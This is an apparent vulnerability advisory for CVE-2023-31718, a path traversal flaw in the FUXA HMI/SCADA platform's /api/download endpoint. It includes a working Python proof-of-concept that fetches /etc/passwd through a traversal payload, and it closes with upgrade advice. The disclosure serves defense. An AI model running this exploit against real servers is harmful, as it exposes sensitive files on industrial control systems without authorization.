FUXA, a popular web-based HMI/SCADA visualization platform, has been found to be susceptible to a local file inclusion (LFI) vulnerability. The vulnerability is present in FUXA versions 1.1.12 and below. In this post, we will explore the details of this vulnerability (CVE-2023-31718), provide a code snippet to demonstrate the exploit, and share links to the original references.

Vulnerability Details

The LFI vulnerability resides in the /api/download functionality of the FUXA platform and can be exploited by an attacker with access to the local API. By exploiting this vulnerability, an attacker can read sensitive files on the server, leading to information disclosure or even unauthorized command execution.

The LFI vulnerability is caused by insufficient validation of user-supplied input in the 'file' parameter of the /api/download API endpoint. An attacker can manipulate the input to include local files, leading to these files being read and displayed.

Exploit Example

The following Python code snippet demonstrates how an attacker can exploit CVE-2023-31718 to read sensitive files on the server:

import requests

target_url = "http://<target-ip>:<port>";
lfi_file = "../../../../../../etc/passwd"  # Example file for demonstration purposes

vulnerable_endpoint = f"{target_url}/api/download"

payload = {
    'file': lfi_file
}

response = requests.get(vulnerable_endpoint, params=payload)

if response.status_code == 200:
    print(f"[*] Successfully retrieved contents of {lfi_file}:")
    print(response.text)
else:
    print(f"[!] Failed to retrieve contents of {lfi_file}")

Replace <target-ip> and <port> with the relevant IP address and port number. Running this script will send a request to the vulnerable endpoint with the malicious payload, resulting in the contents of /etc/passwd being read and displayed.

It is important to note that this is an example, and the attacker could request any file they have knowledge of or can determine the presence of on the target system.

Mitigation

To mitigate this vulnerability, users should update their FUXA installations to version 1.1.13 or later. In addition, developers and system administrators should ensure that proper security measures are in place, such as validating and sanitizing user input, restricting access to sensitive files on the server, and implementing least-privilege permissions for accessing the system.

For more information on this vulnerability, you can refer to the following sources

1. CVE Details for CVE-2023-31718
2. NVD - CVE-2023-31718
3. FUXA GitHub Repository

Conclusion

CVE-2023-31718 is a critical local file inclusion vulnerability affecting FUXA 1.1.12 and earlier. By exploiting this vulnerability, an attacker can gain unauthorized access to sensitive files on the server. It is recommended that users upgrade their FUXA installations to version 1.1.13 or later to mitigate this vulnerability.

Please be aware that exploiting this vulnerability without proper authorization may be illegal. The information provided in this post is for educational purposes only.

Timeline

Published on: 09/22/2023 00:15:00 UTC
Last modified on: 09/25/2023 16:43:00 UTC